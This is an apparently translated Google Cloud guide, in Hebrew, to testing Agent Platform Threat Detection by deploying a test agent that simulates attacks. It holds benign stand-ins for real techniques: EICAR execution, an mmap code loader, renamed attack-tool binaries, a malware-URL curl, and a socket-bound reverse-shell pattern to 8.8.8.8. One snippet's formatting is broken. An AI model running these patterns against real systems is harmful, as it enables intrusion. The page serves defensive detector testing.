בדיקה של זיהוי איומים ב-Agent Platform

בדף הזה מוסבר איך לוודא שזיהוי האיומים בפלטפורמת הנציגים פועל. לשם כך, מפעילים בכוונה גלאים ובודקים אם נמצאו ממצאים. התכונה Agent Platform Threat Detection היא שירות מובנה של Security Command Center.

לפני שמתחילים

כדי לזהות איומים פוטנציאליים על סוכני Agent Runtime, צריך לוודא שהשירות Agent Platform Threat Detection מופעל ב-Security Command Center.

הגדרת הסביבה

כדי לבדוק את התכונה 'זיהוי איומים בפלטפורמת הנציגים', צריך להגדיר נציג הדגמה שמדמה פעילות זדונית.

יצירת פרויקט והפעלת מעטפת

בוחרים או יוצרים Google Cloud פרויקט לשימוש בבדיקה.

כדי לבדוק את אמצעי הזיהוי, אפשר להשתמש במסוף Google Cloud וב-Cloud Shell.

  1. עוברים אל Google Cloud המסוף.

    כניסה ל Google Cloud מסוף

  2. בוחרים את הפרויקט שבו רוצים להשתמש לבדיקה.

  3. לוחצים על הפעלת Cloud Shell.

אפשר גם להריץ את הוראות הבדיקה משורת פקודה מקומית.

הגדרת Agent Runtime

אם זו הפעם הראשונה שאתם משתמשים ב-Agent Runtime בפרויקט הזה, אתם צריכים להגדיר את סביבת Agent Runtime לפני שמתחילים. רושמים את השם של קטגוריית הביניים של Cloud Storage שיצרתם. מומלץ גם לעיין במדריך להתחלה מהירה בנושא Agent Runtime כדי ללמוד איך לפתח ולפרוס סוכן באמצעות Vertex AI SDK.

יצירת סקריפט בדיקה

תצטרכו ליצור כמה קבצים שישמשו לפריסת סוכן חדש לצורך בדיקה. לשם כך, צריך להשתמש בעורך טקסט, כמו nano.

  1. יוצרים קובץ חדש בשם requirements.txt עם התוכן הבא.

    google-cloud-aiplatform[agent_engines]
    google-adk
    google-genai
    aiohttp
    cloudpickle
    pydantic
    
  2. יוצרים קובץ ריק חדש בשם installation_scripts/install.sh. חלק מהבדיקות דורשות הוספת תוכן לקובץ הזה.

  3. יוצרים קובץ חדש בשם main.py עם התוכן הבא. מחליפים את המשתנים PROJECT_ID, LOCATION ו-STAGING_BUCKET. שם קטגוריית הביניים חייב לכלול את הקידומת gs://.

    import asyncio
    import os
    import subprocess
    import socket
    import vertexai
    from vertexai import Client, agent_engines
    from google.adk.agents import llm_agent
    from google.adk.sessions.in_memory_session_service import InMemorySessionService
    
    # Replace with your own project, location, and staging bucket.
    LOCATION = "LOCATION"
    PROJECT_ID = "PROJECT_ID"
    # Staging bucket must have gs:// prefix
    STAGING_BUCKET = "STAGING_BUCKET"
    
    client = Client(project=PROJECT_ID, location=LOCATION)
    
    def _run_command(args, **kwargs):
      output = f"Called {' '.join(args)}\n"
      try:
        res = subprocess.run(args, capture_output=True, text=True, **kwargs)
        if res.stdout:
          output += f"Result: {res.stdout.strip()}\n"
        if res.stderr:
          output += f"Error: {res.stderr.strip()}\n"
      except subprocess.TimeoutExpired:
        output += "Command timed out as expected."
      return output
    
    # Tool to simulate threats. The function body will be replaced for individual
    # detector tests.
    def threat_detection_test():
      output = _run_command(["sleep", "60"])
      output += _run_command(["echo", "this is a fake threat"])
      output += _run_command(["sleep", "10"])
      return output
    
    root_agent = llm_agent.Agent(
        model="gemini-2.5-flash",
        name="threat_detection_test_agent",
        description="Runs threat detection test.",
        instruction="""
          You are an agent that runs a threat detection test using a fake malicious
          command.
        """,
        tools=[threat_detection_test],
    )
    
    async def main():
      vertexai.init(
        project=PROJECT_ID,
        location=LOCATION,
        staging_bucket=STAGING_BUCKET,
      )
      app = agent_engines.AdkApp(
          agent=root_agent, session_service_builder=InMemorySessionService
      )
      remote_agent = client.agent_engines.create(
          agent=app,
          config={
              "display_name": "scc_threat_test_agent",
              "identity_type": vertexai.types.IdentityType.AGENT_IDENTITY,
              "requirements": [
                  "google-cloud-aiplatform[agent_engines,adk]",
                  "cloudpickle",
                  "pydantic",
              ],
              "staging_bucket": STAGING_BUCKET,
              "extra_packages": [
                  "installation_scripts/install.sh",
              ],
          },
      )
      print("Deployed agent: ", remote_agent.api_resource.name)
    
      try:
          async for event in remote_agent.async_stream_query(
              user_id="threat_detection_tester",
              message="Run the threat detection test",
          ):
            print(event)
      finally:
          client.agent_engines.delete(name=remote_agent.api_resource.name, force=True)
    
    if __name__ == "__main__":
      asyncio.run(main())
    

הגדרת סביבה וירטואלית

  1. יוצרים ומפעילים סביבה וירטואלית של Python.

      python3 -m venv env
      source env/bin/activate
    
  2. מתקינים את יחסי התלות הנדרשים בסביבה הווירטואלית.

    pip install -r requirements.txt
    

בדיקת הסקריפט

מריצים את הסקריפט מתוך הסביבה הווירטואלית באמצעות python3 main.py. הפקודה הזו תימשך כמה דקות עד שהיא תיצור, תפרוס ותבצע את סוכן הבדיקה.

הסקריפט מוציא את שם המשאב של הסוכן שנפרס, וכמה אובייקטים של JSON, כולל תגובה של LLM ומטא-נתונים אחרים. אם נתקלתם בשגיאות הרשאה או בשגיאות פריסה בשלב הזה, תוכלו לעיין בפתרון הבעיות כדי להבין מה השלבים הבאים.

בדיקת מזהים

כדי לבדוק את הגלאים של Agent Platform Threat Detection, מחליפים את הקוד בפונקציה threat_detection_test בקוד שמדמה מתקפה. יכול להיות שיעבור זמן רב עד שהסקריפט יופעל ויריץ שאילתות על הסוכן. כדי לזרז את הבדיקה, אפשר לשלב את התוכן של כמה מהפונקציות האלה.

ביצוע: נוסף קובץ בינארי זדוני שהופעל

מחליפים את הפונקציה threat_detection_test בסקריפט הבדיקה ומריצים את סקריפט הבדיקה.

def threat_detection_test():
  output = _run_command(["sleep", "60"])
  eicar = r"X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*"
  output += _run_command(["touch", "/tmp/test_mal_file"])
  with open("/tmp/test_mal_file", "w") as f:
    f.write(eicar)
  output += _run_command(["chmod", "700", "/tmp/test_mal_file"])
  output += _run_command(["sh", "-c", "/tmp/test_mal_file"])
  output += _run_command(["sleep", "10"])
  return output

ביצוע: נוספה טעינה של ספרייה זדונית

מחליפים את הפונקציה threat_detection_test בסקריפט הבדיקה ומריצים את סקריפט הבדיקה. יכול להיות שתקבלו שגיאה מ-Vertex AI SDK לגבי ניתוח התגובה, אבל הממצא עדיין ייווצר.

def threat_detection_test():
  output = _run_command(["sleep", "60"])
  eicar = r"X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*"
  with open("/tmp/test_mal_lib", "w") as f:
    f.write(eicar)
  with open("/tmp/loader.c", "w") as f:
    f.write("""
      #include <fcntl.h>
      #include <sys/mman.h>
      #include <sys/stat.h>
      #include <unistd.h>
      #include <stdlib.h>
      int main(int argc, char *argv[]) {
         int fd = open(argv[1], O_RDONLY);
         struct stat sb;
         fstat(fd, &sb);
         void* addr = mmap(NULL, sb.st_size, PROT_EXEC, MAP_PRIVATE, fd, 0);
         write(1, addr, sb.st_size);
         munmap(addr, sb.st_size);
         close(fd);
         return 0;
      }
    """)
  output += _run_command(["gcc", "/tmp/loader.c", "-o", "/tmp/loader"])
  output += _run_command(["/tmp/loader", "/tmp/test_mal_lib"])
  output += _run_command(["sleep", "10"])
  return output

ביצוע: פירצה בקונטיינר

מחליפים את הפונקציה threat_detection_test בסקריפט הבדיקה ומריצים את סקריפט הבדיקה.

def threat_detection_test():
  output = _run_command(["sleep", "60"])
  output += _run_command(["cp", "/bin/ls", "/tmp/botb-linux-amd64"])
  output += _run_command(["chmod", "700", "/tmp/botb-linux-amd64"])
  output += _run_command(["/tmp/botb-linux-amd64", "-autopwn"])
  output += _run_command(["sleep", "10"])
  return output

ביצוע: הרצת כלי לתקיפת Kubernetes

מחליפים את הפונקציה threat_detection_test בסקריפט הבדיקה ומריצים את סקריפט הבדיקה.

def threat_detection_test():
  output = _run_command(["sleep", "60"])
  output += _run_command(["cp", "/bin/ls", "/tmp/amicontained"])
  output += _run_command(["/tmp/amicontained"])
  output += _run_command(["sleep", "10"])
  return output

ביצוע: הפעלת כלי סיור מקומי

מחליפים את הפונקציה threat_detection_test בסקריפט הבדיקה ומריצים את סקריפט הבדיקה.

def threat_detection_test():
  output = _run_command(["sleep", "60"])
  output += _run_command(["cp", "/bin/ls", "/tmp/linenum.sh"])
  output += _run_command(["/tmp/linenum.sh"])
  output += _run_command(["sleep", "10"])
  return output

ביצוע: קובץ בינארי זדוני שונה הופעל

Replace the `threat_detection_test` function in the test script, and then run the
test script.

```python
def threat_detection_test():
    eicar = r"X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*"
    output = _run_command(["sleep", "60"])
    output += _run_command(["chmod", "-R", "777", "/code"])
    with open("/code/entrypoint.sh", "w") as f:
f.write(eicar)

‪output += _run_command(["chmod", "700", "/code/entrypoint.sh"]) output += _run_command(["sh", "-c", "/code/entrypoint.sh"]) output += _run_command(["sleep", "10"]) return output ```

ביצוע: ספרייה זדונית ששונתה נטענה

מחליפים את הפונקציה threat_detection_test בסקריפט הבדיקה ומריצים את סקריפט הבדיקה.

def threat_detection_test():
  eicar = r"X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*"
  output = _run_command(["sleep", "60"])
  output += _run_command(["chmod", "-R", "777", "/code"])
  with open("/code/entrypoint.sh", "w") as f:
    f.write(eicar)
  with open("/tmp/loader.c", "w") as f:
    f.write("""
      #include <fcntl.h>
      #include <sys/mman.h>
      #include <sys/stat.h>
      #include <unistd.h>
      #include <stdlib.h>
      int main(int argc, char *argv[]) {
         int fd = open(argv[1], O_RDONLY);
         struct stat sb;
         fstat(fd, &sb);
         void* addr = mmap(NULL, sb.st_size, PROT_EXEC, MAP_PRIVATE, fd, 0);
         write(1, addr, sb.st_size);
         munmap(addr, sb.st_size);
         close(fd);
         return 0;
      }
    """)
  output += _run_command(["gcc", "/tmp/loader.c", "-o", "/tmp/loader"])
  output += _run_command(["/tmp/loader", "/code/entrypoint.sh"])
  output += _run_command(["sleep", "10"])
  return output

זוהתה כתובת URL זדונית

מעדכנים את הקובץ installation_scripts/install.sh עם התוכן הבא.

#!/bin/bash
apt-get install -y curl --no-install-recommends

מחליפים את הפונקציה threat_detection_test בסקריפט הבדיקה ומריצים את סקריפט הבדיקה.

def threat_detection_test():
  url = "https://testsafebrowsing.appspot.com/s/malware.html"
  output = _run_command(["sleep", "60"])
  output += _run_command(["curl", url])
  output += _run_command(["sleep", "10"])
  return output

Reverse Shell

מחליפים את הפונקציה threat_detection_test בסקריפט הבדיקה ומריצים את סקריפט הבדיקה.

def threat_detection_test():
  output = _run_command(["sleep", "60"])
  output += _run_command(["cp", "/bin/echo", "/tmp/sh"])
  s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
  s.connect(("8.8.8.8", 53))
  subprocess.run(["/tmp/sh"], stdin=s, stdout=s, stderr=s, timeout=5)
  output += _run_command(["sleep", "10"])
  return output

המאמרים הבאים